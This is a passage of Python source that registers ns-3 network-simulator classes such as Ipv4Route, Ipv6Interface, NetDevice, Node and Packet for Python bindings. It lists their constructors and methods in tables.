    for ctor_params in ([], [param('ns3::Ipv4MaskChecker const &', 'arg0')]):
        cls.add_constructor(ctor_params)
    return
def register_Ns3Ipv4MaskValue_methods(root_module, cls):
    """Register bindings for ns3::Ipv4MaskValue (ipv4-address.h, module 'network').

    Exposes the AttributeValue interface (Copy / serialization) plus the typed
    Get/Set accessors for the wrapped ns3::Ipv4Mask.
    """
    # Constructors: default, copy, and from an Ipv4Mask value.
    cls.add_constructor([])
    cls.add_constructor([param('ns3::Ipv4MaskValue const &', 'arg0')])
    cls.add_constructor([param('ns3::Ipv4Mask const &', 'value')])
    # (name, return type, parameters, extra add_method kwargs)
    method_table = [
        ('Copy', 'ns3::Ptr< ns3::AttributeValue >', [],
         {'is_const': True, 'is_virtual': True}),
        ('DeserializeFromString', 'bool',
         [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
         {'is_virtual': True}),
        ('Get', 'ns3::Ipv4Mask', [], {'is_const': True}),
        ('SerializeToString', 'std::string',
         [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
         {'is_const': True, 'is_virtual': True}),
        ('Set', 'void', [param('ns3::Ipv4Mask const &', 'value')], {}),
    ]
    for name, retval, params, extra in method_table:
        cls.add_method(name, retval, params, **extra)
    return
def register_Ns3Ipv4MulticastRoute_methods(root_module, cls):
    """Register bindings for ns3::Ipv4MulticastRoute (ipv4-route.h, module 'internet')."""
    # Copy constructor first (matches generator ordering), then default.
    cls.add_constructor([param('ns3::Ipv4MulticastRoute const &', 'arg0')])
    cls.add_constructor([])
    # (name, return type, parameters, extra add_method kwargs)
    method_table = [
        ('GetGroup', 'ns3::Ipv4Address', [], {'is_const': True}),
        ('GetOrigin', 'ns3::Ipv4Address', [], {'is_const': True}),
        # GetOutputTtl is marked deprecated upstream; keep the flag.
        ('GetOutputTtl', 'uint32_t', [param('uint32_t', 'oif')], {'deprecated': True}),
        ('GetOutputTtlMap', 'std::map< unsigned int, unsigned int >', [], {'is_const': True}),
        ('GetParent', 'uint32_t', [], {'is_const': True}),
        ('SetGroup', 'void', [param('ns3::Ipv4Address const', 'group')], {}),
        ('SetOrigin', 'void', [param('ns3::Ipv4Address const', 'origin')], {}),
        ('SetOutputTtl', 'void', [param('uint32_t', 'oif'), param('uint32_t', 'ttl')], {}),
        ('SetParent', 'void', [param('uint32_t', 'iif')], {}),
    ]
    for name, retval, params, extra in method_table:
        cls.add_method(name, retval, params, **extra)
    # Public static constants.
    cls.add_static_attribute('MAX_INTERFACES', 'uint32_t const', is_const=True)
    cls.add_static_attribute('MAX_TTL', 'uint32_t const', is_const=True)
    return
def register_Ns3Ipv4Route_methods(root_module, cls):
    """Register bindings for ns3::Ipv4Route (ipv4-route.h, module 'internet').

    The class is a plain value holder: four const getters mirrored by four
    setters, plus operator<< support.
    """
    cls.add_output_stream_operator()
    cls.add_constructor([param('ns3::Ipv4Route const &', 'arg0')])
    cls.add_constructor([])
    # Parameterless const getters.
    for name, retval in (('GetDestination', 'ns3::Ipv4Address'),
                         ('GetGateway', 'ns3::Ipv4Address'),
                         ('GetOutputDevice', 'ns3::Ptr< ns3::NetDevice >'),
                         ('GetSource', 'ns3::Ipv4Address')):
        cls.add_method(name, retval, [], is_const=True)
    # Matching setters, all returning void.
    for name, args in (('SetDestination', [param('ns3::Ipv4Address', 'dest')]),
                       ('SetGateway', [param('ns3::Ipv4Address', 'gw')]),
                       ('SetOutputDevice', [param('ns3::Ptr< ns3::NetDevice >', 'outputDevice')]),
                       ('SetSource', [param('ns3::Ipv4Address', 'src')])):
        cls.add_method(name, 'void', args)
    return
def register_Ns3Ipv4RoutingProtocol_methods(root_module, cls):
    """Register bindings for the abstract base ns3::Ipv4RoutingProtocol
    (ipv4-routing-protocol.h, module 'internet').

    Everything except GetTypeId is pure virtual; the RouteInput callbacks are
    spelled out as fully-expanded ns3::Callback template instantiations.
    """
    cls.add_constructor([])
    cls.add_constructor([param('ns3::Ipv4RoutingProtocol const &', 'arg0')])
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    # Pure-virtual notification hooks invoked by Ipv4L3Protocol.
    cls.add_method('NotifyAddAddress', 'void',
                   [param('uint32_t', 'interface'), param('ns3::Ipv4InterfaceAddress', 'address')],
                   is_pure_virtual=True, is_virtual=True)
    cls.add_method('NotifyInterfaceDown', 'void',
                   [param('uint32_t', 'interface')],
                   is_pure_virtual=True, is_virtual=True)
    cls.add_method('NotifyInterfaceUp', 'void',
                   [param('uint32_t', 'interface')],
                   is_pure_virtual=True, is_virtual=True)
    cls.add_method('NotifyRemoveAddress', 'void',
                   [param('uint32_t', 'interface'), param('ns3::Ipv4InterfaceAddress', 'address')],
                   is_pure_virtual=True, is_virtual=True)
    cls.add_method('PrintRoutingTable', 'void',
                   [param('ns3::Ptr< ns3::OutputStreamWrapper >', 'stream')],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    # Routing entry points: unicast/multicast/local/error callbacks for input,
    # plus the synchronous output lookup.
    cls.add_method('RouteInput', 'bool',
                   [param('ns3::Ptr< ns3::Packet const >', 'p'),
                    param('ns3::Ipv4Header const &', 'header'),
                    param('ns3::Ptr< ns3::NetDevice const >', 'idev'),
                    param('ns3::Callback< void, ns3::Ptr< ns3::Ipv4Route >, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'ucb'),
                    param('ns3::Callback< void, ns3::Ptr< ns3::Ipv4MulticastRoute >, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'mcb'),
                    param('ns3::Callback< void, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, unsigned int, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'lcb'),
                    param('ns3::Callback< void, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, ns3::Socket::SocketErrno, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'ecb')],
                   is_pure_virtual=True, is_virtual=True)
    cls.add_method('RouteOutput', 'ns3::Ptr< ns3::Ipv4Route >',
                   [param('ns3::Ptr< ns3::Packet >', 'p'),
                    param('ns3::Ipv4Header const &', 'header'),
                    param('ns3::Ptr< ns3::NetDevice >', 'oif'),
                    param('ns3::Socket::SocketErrno &', 'sockerr')],
                   is_pure_virtual=True, is_virtual=True)
    cls.add_method('SetIpv4', 'void',
                   [param('ns3::Ptr< ns3::Ipv4 >', 'ipv4')],
                   is_pure_virtual=True, is_virtual=True)
    return
def register_Ns3Ipv6AddressChecker_methods(root_module, cls):
    """Register bindings for ns3::Ipv6AddressChecker (ipv6-address.h, module 'network').

    Only the default and copy constructors are exposed.
    """
    for ctor_params in ([], [param('ns3::Ipv6AddressChecker const &', 'arg0')]):
        cls.add_constructor(ctor_params)
    return
def register_Ns3Ipv6AddressValue_methods(root_module, cls):
    """Register bindings for ns3::Ipv6AddressValue (ipv6-address.h, module 'network').

    Exposes the AttributeValue interface (Copy / serialization) plus the typed
    Get/Set accessors for the wrapped ns3::Ipv6Address.
    """
    # Constructors: default, copy, and from an Ipv6Address value.
    cls.add_constructor([])
    cls.add_constructor([param('ns3::Ipv6AddressValue const &', 'arg0')])
    cls.add_constructor([param('ns3::Ipv6Address const &', 'value')])
    # (name, return type, parameters, extra add_method kwargs)
    method_table = [
        ('Copy', 'ns3::Ptr< ns3::AttributeValue >', [],
         {'is_const': True, 'is_virtual': True}),
        ('DeserializeFromString', 'bool',
         [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
         {'is_virtual': True}),
        ('Get', 'ns3::Ipv6Address', [], {'is_const': True}),
        ('SerializeToString', 'std::string',
         [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
         {'is_const': True, 'is_virtual': True}),
        ('Set', 'void', [param('ns3::Ipv6Address const &', 'value')], {}),
    ]
    for name, retval, params, extra in method_table:
        cls.add_method(name, retval, params, **extra)
    return
def register_Ns3Ipv6Interface_methods(root_module, cls):
    """Register bindings for ns3::Ipv6Interface (ipv6-interface.h, module 'internet').

    Methods are registered from a table to keep this mechanical listing
    compact; table order matches the generator's original call order.
    """
    # Copy constructor first (matches generator ordering), then default.
    cls.add_constructor([param('ns3::Ipv6Interface const &', 'arg0')])
    cls.add_constructor([])
    # (name, return type, parameters, extra add_method kwargs)
    method_table = [
        ('AddAddress', 'bool', [param('ns3::Ipv6InterfaceAddress', 'iface')], {}),
        ('GetAddress', 'ns3::Ipv6InterfaceAddress', [param('uint32_t', 'index')], {'is_const': True}),
        ('GetAddressMatchingDestination', 'ns3::Ipv6InterfaceAddress', [param('ns3::Ipv6Address', 'dst')], {}),
        ('GetBaseReachableTime', 'uint16_t', [], {'is_const': True}),
        ('GetCurHopLimit', 'uint8_t', [], {'is_const': True}),
        ('GetDevice', 'ns3::Ptr< ns3::NetDevice >', [], {'is_const': True, 'is_virtual': True}),
        ('GetLinkLocalAddress', 'ns3::Ipv6InterfaceAddress', [], {'is_const': True}),
        ('GetMetric', 'uint16_t', [], {'is_const': True}),
        ('GetNAddresses', 'uint32_t', [], {'is_const': True}),
        ('GetReachableTime', 'uint16_t', [], {'is_const': True}),
        ('GetRetransTimer', 'uint16_t', [], {'is_const': True}),
        ('GetTypeId', 'ns3::TypeId', [], {'is_static': True}),
        ('IsDown', 'bool', [], {'is_const': True}),
        ('IsForwarding', 'bool', [], {'is_const': True}),
        ('IsUp', 'bool', [], {'is_const': True}),
        # RemoveAddress is overloaded: by index and by address.
        ('RemoveAddress', 'ns3::Ipv6InterfaceAddress', [param('uint32_t', 'index')], {}),
        ('RemoveAddress', 'ns3::Ipv6InterfaceAddress', [param('ns3::Ipv6Address', 'address')], {}),
        ('Send', 'void', [param('ns3::Ptr< ns3::Packet >', 'p'), param('ns3::Ipv6Address', 'dest')], {}),
        ('SetBaseReachableTime', 'void', [param('uint16_t', 'baseReachableTime')], {}),
        ('SetCurHopLimit', 'void', [param('uint8_t', 'curHopLimit')], {}),
        ('SetDevice', 'void', [param('ns3::Ptr< ns3::NetDevice >', 'device')], {}),
        ('SetDown', 'void', [], {}),
        ('SetForwarding', 'void', [param('bool', 'forward')], {}),
        ('SetMetric', 'void', [param('uint16_t', 'metric')], {}),
        ('SetNode', 'void', [param('ns3::Ptr< ns3::Node >', 'node')], {}),
        ('SetNsDadUid', 'void', [param('ns3::Ipv6Address', 'address'), param('uint32_t', 'uid')], {}),
        ('SetReachableTime', 'void', [param('uint16_t', 'reachableTime')], {}),
        ('SetRetransTimer', 'void', [param('uint16_t', 'retransTimer')], {}),
        ('SetState', 'void', [param('ns3::Ipv6Address', 'address'), param('ns3::Ipv6InterfaceAddress::State_e', 'state')], {}),
        ('SetUp', 'void', [], {}),
        # DoDispose is the protected Object teardown override.
        ('DoDispose', 'void', [], {'visibility': 'protected', 'is_virtual': True}),
    ]
    for name, retval, params, extra in method_table:
        cls.add_method(name, retval, params, **extra)
    return
def register_Ns3Ipv6PrefixChecker_methods(root_module, cls):
    """Register bindings for ns3::Ipv6PrefixChecker (ipv6-address.h, module 'network').

    Only the default and copy constructors are exposed.
    """
    for ctor_params in ([], [param('ns3::Ipv6PrefixChecker const &', 'arg0')]):
        cls.add_constructor(ctor_params)
    return
def register_Ns3Ipv6PrefixValue_methods(root_module, cls):
    """Register bindings for ns3::Ipv6PrefixValue (ipv6-address.h, module 'network').

    Exposes the AttributeValue interface (Copy / serialization) plus the typed
    Get/Set accessors for the wrapped ns3::Ipv6Prefix.
    """
    # Constructors: default, copy, and from an Ipv6Prefix value.
    cls.add_constructor([])
    cls.add_constructor([param('ns3::Ipv6PrefixValue const &', 'arg0')])
    cls.add_constructor([param('ns3::Ipv6Prefix const &', 'value')])
    # (name, return type, parameters, extra add_method kwargs)
    method_table = [
        ('Copy', 'ns3::Ptr< ns3::AttributeValue >', [],
         {'is_const': True, 'is_virtual': True}),
        ('DeserializeFromString', 'bool',
         [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
         {'is_virtual': True}),
        ('Get', 'ns3::Ipv6Prefix', [], {'is_const': True}),
        ('SerializeToString', 'std::string',
         [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
         {'is_const': True, 'is_virtual': True}),
        ('Set', 'void', [param('ns3::Ipv6Prefix const &', 'value')], {}),
    ]
    for name, retval, params, extra in method_table:
        cls.add_method(name, retval, params, **extra)
    return
def register_Ns3LogNormalRandomVariable_methods(root_module, cls):
    """Register bindings for ns3::LogNormalRandomVariable
    (random-variable-stream.h, module 'core')."""
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    cls.add_constructor([])
    # Accessors for the configured distribution parameters.
    cls.add_method('GetMu', 'double', [], is_const=True)
    cls.add_method('GetSigma', 'double', [], is_const=True)
    # Draws with explicitly supplied mu/sigma...
    cls.add_method('GetValue', 'double',
                   [param('double', 'mu'), param('double', 'sigma')])
    cls.add_method('GetInteger', 'uint32_t',
                   [param('uint32_t', 'mu'), param('uint32_t', 'sigma')])
    # ...and the virtual parameterless draws using the attribute-set values.
    cls.add_method('GetValue', 'double', [], is_virtual=True)
    cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True)
    return
def register_Ns3NetDevice_methods(root_module, cls):
    """Register bindings for the abstract base ns3::NetDevice
    (net-device.h, module 'network').

    Every method except GetTypeId is pure virtual; the two kwarg combinations
    that recur are factored into `pv` / `pv_const` below.
    """
    cls.add_constructor([])
    cls.add_constructor([param('ns3::NetDevice const &', 'arg0')])
    pv = {'is_pure_virtual': True, 'is_virtual': True}
    pv_const = {'is_pure_virtual': True, 'is_const': True, 'is_virtual': True}
    cls.add_method('AddLinkChangeCallback', 'void',
                   [param('ns3::Callback< void, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'callback')],
                   **pv)
    # Const getters.
    cls.add_method('GetAddress', 'ns3::Address', [], **pv_const)
    cls.add_method('GetBroadcast', 'ns3::Address', [], **pv_const)
    cls.add_method('GetChannel', 'ns3::Ptr< ns3::Channel >', [], **pv_const)
    cls.add_method('GetIfIndex', 'uint32_t', [], **pv_const)
    cls.add_method('GetMtu', 'uint16_t', [], **pv_const)
    # GetMulticast is overloaded for IPv4 groups and IPv6 addresses.
    cls.add_method('GetMulticast', 'ns3::Address',
                   [param('ns3::Ipv4Address', 'multicastGroup')], **pv_const)
    cls.add_method('GetMulticast', 'ns3::Address',
                   [param('ns3::Ipv6Address', 'addr')], **pv_const)
    cls.add_method('GetNode', 'ns3::Ptr< ns3::Node >', [], **pv_const)
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    # Boolean capability queries, all parameterless const pure-virtuals.
    for query in ('IsBridge', 'IsBroadcast', 'IsLinkUp', 'IsMulticast',
                  'IsPointToPoint', 'NeedsArp'):
        cls.add_method(query, 'bool', [], **pv_const)
    # Transmission entry points.
    cls.add_method('Send', 'bool',
                   [param('ns3::Ptr< ns3::Packet >', 'packet'),
                    param('ns3::Address const &', 'dest'),
                    param('uint16_t', 'protocolNumber')],
                   **pv)
    cls.add_method('SendFrom', 'bool',
                   [param('ns3::Ptr< ns3::Packet >', 'packet'),
                    param('ns3::Address const &', 'source'),
                    param('ns3::Address const &', 'dest'),
                    param('uint16_t', 'protocolNumber')],
                   **pv)
    # Mutators.
    cls.add_method('SetAddress', 'void', [param('ns3::Address', 'address')], **pv)
    cls.add_method('SetIfIndex', 'void', [param('uint32_t const', 'index')], **pv)
    cls.add_method('SetMtu', 'bool', [param('uint16_t const', 'mtu')], **pv)
    cls.add_method('SetNode', 'void', [param('ns3::Ptr< ns3::Node >', 'node')], **pv)
    # Receive hooks; callback types fully expanded as in the generator output.
    cls.add_method('SetPromiscReceiveCallback', 'void',
                   [param('ns3::Callback< bool, ns3::Ptr< ns3::NetDevice >, ns3::Ptr< ns3::Packet const >, short unsigned int, ns3::Address const &, ns3::Address const &, ns3::NetDevice::PacketType, ns3::empty, ns3::empty, ns3::empty >', 'cb')],
                   **pv)
    cls.add_method('SetReceiveCallback', 'void',
                   [param('ns3::Callback< bool, ns3::Ptr< ns3::NetDevice >, ns3::Ptr< ns3::Packet const >, short unsigned int, ns3::Address const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'cb')],
                   **pv)
    cls.add_method('SupportsSendFrom', 'bool', [], **pv_const)
    return
def register_Ns3NixVector_methods(root_module, cls):
    """Register bindings for ns3::NixVector (nix-vector.h, module 'network')."""
    cls.add_output_stream_operator()
    cls.add_constructor([])
    cls.add_constructor([param('ns3::NixVector const &', 'o')])
    # (name, return type, parameters, extra add_method kwargs)
    method_table = [
        ('AddNeighborIndex', 'void',
         [param('uint32_t', 'newBits'), param('uint32_t', 'numberOfBits')], {}),
        ('BitCount', 'uint32_t', [param('uint32_t', 'numberOfNeighbors')], {'is_const': True}),
        ('Copy', 'ns3::Ptr< ns3::NixVector >', [], {'is_const': True}),
        ('Deserialize', 'uint32_t',
         [param('uint32_t const *', 'buffer'), param('uint32_t', 'size')], {}),
        ('ExtractNeighborIndex', 'uint32_t', [param('uint32_t', 'numberOfBits')], {}),
        ('GetRemainingBits', 'uint32_t', [], {}),
        ('GetSerializedSize', 'uint32_t', [], {'is_const': True}),
        ('Serialize', 'uint32_t',
         [param('uint32_t *', 'buffer'), param('uint32_t', 'maxSize')], {'is_const': True}),
    ]
    for name, retval, params, extra in method_table:
        cls.add_method(name, retval, params, **extra)
    return
def register_Ns3Node_methods(root_module, cls):
    """Register the Python bindings for ns3::Node (node.h, module 'network')."""
    # Copy constructor, default constructor, and explicit system-id constructor.
    cls.add_constructor([param('ns3::Node const &', 'arg0')])
    cls.add_constructor([])
    cls.add_constructor([param('uint32_t', 'systemId')])
    # Long callback type names shared by several registrations, factored out for readability.
    listener_cb = 'ns3::Callback< void, ns3::Ptr< ns3::NetDevice >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >'
    handler_cb = 'ns3::Callback< void, ns3::Ptr< ns3::NetDevice >, ns3::Ptr< ns3::Packet const >, unsigned short, ns3::Address const &, ns3::Address const &, ns3::NetDevice::PacketType, ns3::empty, ns3::empty, ns3::empty >'
    # (method name, return type, parameters, extra keyword arguments)
    methods = [
        ('AddApplication', 'uint32_t',
         [param('ns3::Ptr< ns3::Application >', 'application')], {}),
        ('AddDevice', 'uint32_t',
         [param('ns3::Ptr< ns3::NetDevice >', 'device')], {}),
        ('ChecksumEnabled', 'bool', [], {'is_static': True}),
        ('GetApplication', 'ns3::Ptr< ns3::Application >',
         [param('uint32_t', 'index')], {'is_const': True}),
        ('GetDevice', 'ns3::Ptr< ns3::NetDevice >',
         [param('uint32_t', 'index')], {'is_const': True}),
        ('GetId', 'uint32_t', [], {'is_const': True}),
        ('GetNApplications', 'uint32_t', [], {'is_const': True}),
        ('GetNDevices', 'uint32_t', [], {'is_const': True}),
        ('GetSystemId', 'uint32_t', [], {'is_const': True}),
        ('GetTypeId', 'ns3::TypeId', [], {'is_static': True}),
        ('RegisterDeviceAdditionListener', 'void',
         [param(listener_cb, 'listener')], {}),
        ('RegisterProtocolHandler', 'void',
         [param(handler_cb, 'handler'), param('uint16_t', 'protocolType'),
          param('ns3::Ptr< ns3::NetDevice >', 'device'),
          param('bool', 'promiscuous', default_value='false')], {}),
        ('UnregisterDeviceAdditionListener', 'void',
         [param(listener_cb, 'listener')], {}),
        ('UnregisterProtocolHandler', 'void',
         [param(handler_cb, 'handler')], {}),
        ('DoDispose', 'void', [], {'visibility': 'protected', 'is_virtual': True}),
        ('DoInitialize', 'void', [], {'visibility': 'protected', 'is_virtual': True}),
    ]
    for name, retval, params, kwargs in methods:
        cls.add_method(name, retval, params, **kwargs)
    return
def register_Ns3NormalRandomVariable_methods(root_module, cls):
    """Register the Python bindings for ns3::NormalRandomVariable (random-variable-stream.h, module 'core')."""
    # Static INFINITE_VALUE constant used as the default bound.
    cls.add_static_attribute('INFINITE_VALUE', 'double const', is_const=True)
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    cls.add_constructor([])
    # Const accessors for the configured distribution parameters.
    for accessor in ('GetMean', 'GetVariance', 'GetBound'):
        cls.add_method(accessor, 'double', [], is_const=True)
    # Draws with explicit parameters (bound defaults to INFINITE_VALUE).
    cls.add_method('GetValue', 'double',
                   [param('double', 'mean'), param('double', 'variance'),
                    param('double', 'bound', default_value='ns3::NormalRandomVariable::INFINITE_VALUE')])
    cls.add_method('GetInteger', 'uint32_t',
                   [param('uint32_t', 'mean'), param('uint32_t', 'variance'),
                    param('uint32_t', 'bound')])
    # Virtual draws using the attribute-configured parameters.
    cls.add_method('GetValue', 'double', [], is_virtual=True)
    cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True)
    return
def register_Ns3ObjectFactoryChecker_methods(root_module, cls):
    """Register the Python bindings for ns3::ObjectFactoryChecker (object-factory.h, module 'core')."""
    # Default constructor followed by the copy constructor.
    for ctor_params in ([], [param('ns3::ObjectFactoryChecker const &', 'arg0')]):
        cls.add_constructor(ctor_params)
    return
def register_Ns3ObjectFactoryValue_methods(root_module, cls):
    """Register the Python bindings for ns3::ObjectFactoryValue (object-factory.h, module 'core')."""
    # Default, copy, and from-ns3::ObjectFactory constructors.
    for ctor_params in (
            [],
            [param('ns3::ObjectFactoryValue const &', 'arg0')],
            [param('ns3::ObjectFactory const &', 'value')]):
        cls.add_constructor(ctor_params)
    checker_type = 'ns3::Ptr< ns3::AttributeChecker const >'
    # Standard ns3::AttributeValue interface plus the typed Get/Set pair.
    for name, retval, params, kwargs in (
            ('Copy', 'ns3::Ptr< ns3::AttributeValue >', [],
             {'is_const': True, 'is_virtual': True}),
            ('DeserializeFromString', 'bool',
             [param('std::string', 'value'), param(checker_type, 'checker')],
             {'is_virtual': True}),
            ('Get', 'ns3::ObjectFactory', [], {'is_const': True}),
            ('SerializeToString', 'std::string', [param(checker_type, 'checker')],
             {'is_const': True, 'is_virtual': True}),
            ('Set', 'void', [param('ns3::ObjectFactory const &', 'value')], {})):
        cls.add_method(name, retval, params, **kwargs)
    return
def register_Ns3OutputStreamWrapper_methods(root_module, cls):
    """Register the Python bindings for ns3::OutputStreamWrapper (output-stream-wrapper.h, module 'network')."""
    # Copy constructor, (filename, mode) constructor, and raw-ostream constructor.
    for ctor_params in (
            [param('ns3::OutputStreamWrapper const &', 'arg0')],
            [param('std::string', 'filename'), param('std::_Ios_Openmode', 'filemode')],
            [param('std::ostream *', 'os')]):
        cls.add_constructor(ctor_params)
    # Accessor for the wrapped output stream.
    cls.add_method('GetStream', 'std::ostream *', [])
    return
def register_Ns3Packet_methods(root_module, cls):
    """Register the Python bindings for ns3::Packet (packet.h, module 'network')."""
    cls.add_output_stream_operator()
    # Default, copy, size-only, (buffer, size, magic), and (buffer, size) constructors.
    for ctor_params in (
            [],
            [param('ns3::Packet const &', 'o')],
            [param('uint32_t', 'size')],
            [param('uint8_t const *', 'buffer'), param('uint32_t', 'size'),
             param('bool', 'magic')],
            [param('uint8_t const *', 'buffer'), param('uint32_t', 'size')]):
        cls.add_constructor(ctor_params)
    # (method name, return type, parameters, extra keyword arguments)
    methods = [
        ('AddAtEnd', 'void', [param('ns3::Ptr< ns3::Packet const >', 'packet')], {}),
        ('AddByteTag', 'void', [param('ns3::Tag const &', 'tag')], {'is_const': True}),
        ('AddHeader', 'void', [param('ns3::Header const &', 'header')], {}),
        ('AddPacketTag', 'void', [param('ns3::Tag const &', 'tag')], {'is_const': True}),
        ('AddPaddingAtEnd', 'void', [param('uint32_t', 'size')], {}),
        ('AddTrailer', 'void', [param('ns3::Trailer const &', 'trailer')], {}),
        ('BeginItem', 'ns3::PacketMetadata::ItemIterator', [], {'is_const': True}),
        ('Copy', 'ns3::Ptr< ns3::Packet >', [], {'is_const': True}),
        ('CopyData', 'uint32_t',
         [param('uint8_t *', 'buffer'), param('uint32_t', 'size')], {'is_const': True}),
        ('CopyData', 'void',
         [param('std::ostream *', 'os'), param('uint32_t', 'size')], {'is_const': True}),
        ('CreateFragment', 'ns3::Ptr< ns3::Packet >',
         [param('uint32_t', 'start'), param('uint32_t', 'length')], {'is_const': True}),
        ('EnableChecking', 'void', [], {'is_static': True}),
        ('EnablePrinting', 'void', [], {'is_static': True}),
        ('FindFirstMatchingByteTag', 'bool', [param('ns3::Tag &', 'tag')], {'is_const': True}),
        ('GetByteTagIterator', 'ns3::ByteTagIterator', [], {'is_const': True}),
        ('GetNixVector', 'ns3::Ptr< ns3::NixVector >', [], {'is_const': True}),
        ('GetPacketTagIterator', 'ns3::PacketTagIterator', [], {'is_const': True}),
        ('GetSerializedSize', 'uint32_t', [], {'is_const': True}),
        ('GetSize', 'uint32_t', [], {'is_const': True}),
        ('GetUid', 'uint64_t', [], {'is_const': True}),
        # PeekData is marked deprecated upstream.
        ('PeekData', 'uint8_t const *', [], {'deprecated': True, 'is_const': True}),
        ('PeekHeader', 'uint32_t', [param('ns3::Header &', 'header')], {'is_const': True}),
        ('PeekPacketTag', 'bool', [param('ns3::Tag &', 'tag')], {'is_const': True}),
        ('PeekTrailer', 'uint32_t', [param('ns3::Trailer &', 'trailer')], {}),
        ('Print', 'void', [param('std::ostream &', 'os')], {'is_const': True}),
        ('PrintByteTags', 'void', [param('std::ostream &', 'os')], {'is_const': True}),
        ('PrintPacketTags', 'void', [param('std::ostream &', 'os')], {'is_const': True}),
        ('RemoveAllByteTags', 'void', [], {}),
        ('RemoveAllPacketTags', 'void', [], {}),
        ('RemoveAtEnd', 'void', [param('uint32_t', 'size')], {}),
        ('RemoveAtStart', 'void', [param('uint32_t', 'size')], {}),
        ('RemoveHeader', 'uint32_t', [param('ns3::Header &', 'header')], {}),
        ('RemovePacketTag', 'bool', [param('ns3::Tag &', 'tag')], {}),
        ('RemoveTrailer', 'uint32_t', [param('ns3::Trailer &', 'trailer')], {}),
        ('ReplacePacketTag', 'bool', [param('ns3::Tag &', 'tag')], {}),
        ('Serialize', 'uint32_t',
         [param('uint8_t *', 'buffer'), param('uint32_t', 'maxSize')], {'is_const': True}),
        ('SetNixVector', 'void', [param('ns3::Ptr< ns3::NixVector >', 'arg0')], {}),
    ]
    for name, retval, params, kwargs in methods:
        cls.add_method(name, retval, params, **kwargs)
    return
def register_Ns3ParetoRandomVariable_methods(root_module, cls):
    """Register the Python bindings for ns3::ParetoRandomVariable (random-variable-stream.h, module 'core')."""
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    cls.add_constructor([])
    # Const accessors for the configured distribution parameters.
    for accessor in ('GetMean', 'GetShape', 'GetBound'):
        cls.add_method(accessor, 'double', [], is_const=True)
    # Draws with explicit parameters.
    cls.add_method('GetValue', 'double',
                   [param('double', 'mean'), param('double', 'shape'),
                    param('double', 'bound')])
    cls.add_method('GetInteger', 'uint32_t',
                   [param('uint32_t', 'mean'), param('uint32_t', 'shape'),
                    param('uint32_t', 'bound')])
    # Virtual draws using the attribute-configured parameters.
    cls.add_method('GetValue', 'double', [], is_virtual=True)
    cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True)
    return
def register_Ns3TimeValue_methods(root_module, cls):
    """Register the Python bindings for ns3::TimeValue (nstime.h, module 'core')."""
    # Default, copy, and from-ns3::Time constructors.
    for ctor_params in (
            [],
            [param('ns3::TimeValue const &', 'arg0')],
            [param('ns3::Time const &', 'value')]):
        cls.add_constructor(ctor_params)
    checker_type = 'ns3::Ptr< ns3::AttributeChecker const >'
    # Standard ns3::AttributeValue interface plus the typed Get/Set pair.
    for name, retval, params, kwargs in (
            ('Copy', 'ns3::Ptr< ns3::AttributeValue >', [],
             {'is_const': True, 'is_virtual': True}),
            ('DeserializeFromString', 'bool',
             [param('std::string', 'value'), param(checker_type, 'checker')],
             {'is_virtual': True}),
            ('Get', 'ns3::Time', [], {'is_const': True}),
            ('SerializeToString', 'std::string', [param(checker_type, 'checker')],
             {'is_const': True, 'is_virtual': True}),
            ('Set', 'void', [param('ns3::Time const &', 'value')], {})):
        cls.add_method(name, retval, params, **kwargs)
    return
def register_Ns3TypeIdChecker_methods(root_module, cls):
    """Register the Python bindings for ns3::TypeIdChecker (type-id.h, module 'core')."""
    # Default constructor followed by the copy constructor.
    for ctor_params in ([], [param('ns3::TypeIdChecker const &', 'arg0')]):
        cls.add_constructor(ctor_params)
    return
def register_Ns3TypeIdValue_methods(root_module, cls):
    """Register the Python bindings for ns3::TypeIdValue (type-id.h, module 'core')."""
    # Default, copy, and from-ns3::TypeId constructors.
    for ctor_params in (
            [],
            [param('ns3::TypeIdValue const &', 'arg0')],
            [param('ns3::TypeId const &', 'value')]):
        cls.add_constructor(ctor_params)
    checker_type = 'ns3::Ptr< ns3::AttributeChecker const >'
    # Standard ns3::AttributeValue interface plus the typed Get/Set pair.
    for name, retval, params, kwargs in (
            ('Copy', 'ns3::Ptr< ns3::AttributeValue >', [],
             {'is_const': True, 'is_virtual': True}),
            ('DeserializeFromString', 'bool',
             [param('std::string', 'value'), param(checker_type, 'checker')],
             {'is_virtual': True}),
            ('Get', 'ns3::TypeId', [], {'is_const': True}),
            ('SerializeToString', 'std::string', [param(checker_type, 'checker')],
             {'is_const': True, 'is_virtual': True}),
            ('Set', 'void', [param('ns3::TypeId const &', 'value')], {})):
        cls.add_method(name, retval, params, **kwargs)
    return
def register_Ns3AddressChecker_methods(root_module, cls):
    """Register the Python bindings for ns3::AddressChecker (address.h, module 'network')."""
    # Default constructor followed by the copy constructor.
